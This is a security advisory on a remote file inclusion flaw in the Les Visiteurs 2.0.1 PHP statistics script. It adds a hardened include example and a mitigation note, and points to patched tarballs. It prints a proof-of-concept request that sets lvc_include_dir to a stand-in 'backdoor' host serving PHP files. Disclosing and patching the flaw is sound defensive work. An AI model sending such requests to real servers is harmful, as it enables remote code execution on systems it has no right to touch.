
Les Visiteurs v2.0.1 code injection vulnerability





Les Visiteurs is a great statistics script written in PHP.
It gives you graphical information about the visitors to
your website.



This script was distributed by phpinfo.net but has not been
maintained for a year.



---------

In this version several unprotected includes can be found
in the following files:

- include/config.inc.php
- include/new-visitor.inc.php



It is possible to include a PHP file from a backdoor server
and execute it on the target's server, because the include
directory is taken from the variable lvc_include_dir, which
can be supplied in the request.
You just have to create these files on the backdoor server:

- lang/<lang>.inc.php
- db/db_mysql.inc.php

Fill one of them with something like:

<?
echo '<?
echo "<br><br>included from backdoor server :p<br>";
?>';
?>

and request a URL such as:

http://host/path/include/config.inc.php?lvc_include_dir=http://backdoor/
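The following is an added example, not code from Les Visiteurs or from this advisory. It puts the unsafe include shape the advisory describes next to a hardened version of the same two includes. The exact contents of the original config.inc.php are not quoted on the page, so the "vulnerable shape" in the comment, the language allowlist and the default language 'fr' are assumptions.

```php
<?php
// Added example (not Les Visiteurs' own code).
//
// Assumed vulnerable shape: $lvc_include_dir is never initialised, so with
// register_globals=On a query-string parameter of the same name fills it in
// and the include fetches whatever URL the request names:
//
//   include $lvc_include_dir . 'lang/' . $lang . '.inc.php';
//   include $lvc_include_dir . 'db/db_mysql.inc.php';
//
// Hardened version below.

// 1. The include directory is derived from this file's own location and is
//    never read from request data (dirname(__FILE__) works on every PHP
//    version the script might run under).
define('LVC_INCLUDE_DIR', dirname(__FILE__) . DIRECTORY_SEPARATOR);

/**
 * Returns the absolute path of the language file for $lang, or null when
 * $lang is not one of the shipped languages. Nothing from the request
 * reaches an include statement without passing through this function.
 */
function lvc_lang_file($lang)
{
    // 2. Allowlist of language codes (assumed set; adjust to the files that
    //    actually ship in include/lang/). Strict comparison, strings only.
    $allowed = array('fr', 'en', 'de');
    if (!is_string($lang) || !in_array($lang, $allowed, true)) {
        return null;
    }

    // 3. Belt and braces: resolve the final path and confirm it is still
    //    inside the include directory (realpath() also fails on a missing
    //    file, so a typo in the allowlist cannot include something else).
    $base = realpath(LVC_INCLUDE_DIR) . DIRECTORY_SEPARATOR;
    $real = realpath(LVC_INCLUDE_DIR . 'lang' . DIRECTORY_SEPARATOR . $lang . '.inc.php');
    if ($real === false || strpos($real, $base) !== 0) {
        return null;
    }
    return $real;
}

// Read the language code explicitly from $_GET instead of relying on
// register_globals; fall back to the default language on anything invalid.
$lang     = isset($_GET['lang']) ? $_GET['lang'] : 'fr';
$langFile = lvc_lang_file($lang);
if ($langFile === null) {
    $langFile = lvc_lang_file('fr');
}
if ($langFile === null) {
    // Even the default is missing: refuse to continue rather than include
    // an unverified path.
    exit('Les Visiteurs: language files are missing');
}

require $langFile;
require LVC_INCLUDE_DIR . 'db' . DIRECTORY_SEPARATOR . 'db_mysql.inc.php';
```

Two server-side settings complement the code change: allow_url_include=Off (available since PHP 5.2.0) stops include and require from fetching URLs at all, and on older versions allow_url_fopen=Off has the same effect on includes. For detection, requests whose query string carries a URL in a parameter such as lvc_include_dir=http:// stand out in the web server access log and are worth alerting on whether or not the script has been patched.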

---------





Because the script is not maintained and will not be patched
upstream, I have made tarballs of a patched version.

You will find them at this URL:

http://chezwam.net/main/publications/lesvisiteurs/



Matthieu Peschaud

Epita - France
